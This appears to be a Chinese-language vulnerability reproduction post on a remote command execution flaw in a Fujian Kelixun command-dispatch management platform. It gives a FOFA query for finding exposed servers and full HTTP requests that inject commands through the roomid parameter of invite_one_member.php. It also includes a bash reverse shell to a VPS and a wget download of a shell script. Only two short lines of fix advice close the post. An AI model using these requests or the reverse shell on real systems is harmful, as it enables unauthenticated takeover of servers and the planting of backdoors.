0x01 產(chǎn)品簡介

? ?福建科立訊通信指揮調(diào)度管理平臺是一個專門針對通信行業(yè)的管理平臺。該產(chǎn)品旨在提供高效的指揮調(diào)度和管理解決方案，以幫助通信運營商或相關(guān)機構(gòu)實現(xiàn)更好的運營效率和服務(wù)質(zhì)量。該平臺提供強大的指揮調(diào)度功能，可以實時監(jiān)控和管理通信網(wǎng)絡(luò)設(shè)備、維護人員和工作任務(wù)等。用戶可以通過該平臺發(fā)送指令、調(diào)度人員、分配任務(wù)，并即時獲取現(xiàn)場反饋和報告。

0x02 漏洞概述

??福建科立訊通信有限公司指揮調(diào)度管理平臺invite_one_member.php接口處存在遠(yuǎn)程命令執(zhí)行漏洞，未經(jīng)身份認(rèn)證的攻擊者可通給該漏洞遠(yuǎn)程執(zhí)行命令，寫入后門文件可導(dǎo)致服務(wù)器失陷。

0x03 復(fù)現(xiàn)環(huán)境

FOFA：body="指揮調(diào)度管理平臺"

0x04 漏洞復(fù)現(xiàn)?

PoC

GET /api/client/audiobroadcast/invite_one_member.php?callee=1&roomid=`id>1.txt` HTTP/1.1
Host: your-ip
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

PS：漏洞沒有回顯，可將命令結(jié)果寫到txt里面或者dnslog平臺驗證?

反彈Shell

!/bin/sh
bash -c 'exec bash -i >& /dev/tcp/VPSip/6666 0>&1'

GET /api/client/audiobroadcast/invite_one_member.php?callee=1&roomid=`wget+http://vpsip/1.sh+-O+/tmp/shell.sh` HTTP/1.1
Host: your-ip
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

?0x05?修復(fù)建議

?關(guān)閉互聯(lián)網(wǎng)暴露面或接口處設(shè)置訪問權(quán)限

?升級至安全版本